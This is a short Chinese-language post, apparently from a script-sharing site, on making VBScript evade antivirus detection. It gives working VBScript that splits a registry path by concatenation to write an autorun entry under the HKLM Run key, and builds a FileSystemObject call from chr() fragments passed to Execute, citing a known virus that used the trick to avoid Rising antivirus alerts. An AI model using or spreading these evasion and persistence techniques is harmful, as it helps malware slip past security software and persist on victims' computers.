杀毒的对vbs相当敏感 免杀

复制代码 代码如下:

现在杀毒的对vbs相当敏感，只要发现对注册表的xx作，或使用vbs运行命令（加用户） 就可能被杀。下面谈2方法可以简单解决：

1.使用连接符"&" 如：
Set CURObj = CreateObject("Wscript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"

2.使用Execute函数（BY 动鲨 ）

一些杀毒软件，如瑞星，他门会监视网页中的代码，一旦你创建了FSO或写注册表，即使是正常的脚本他也会报告危险，但是当年新欢乐时光也用了FSO怎么就没报警呢？原因是这个病毒使用Execute这个函数来躲过了防火墙，呵呵。病毒将这段声明代码转化为字符串，然后通过Execute(String)函数执行，举个例子
str="set fso=CreateObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&")"
msgbox str
Execute str
将如上的代码放入test.vbs中就会被创建FSO，而瑞星就不会报警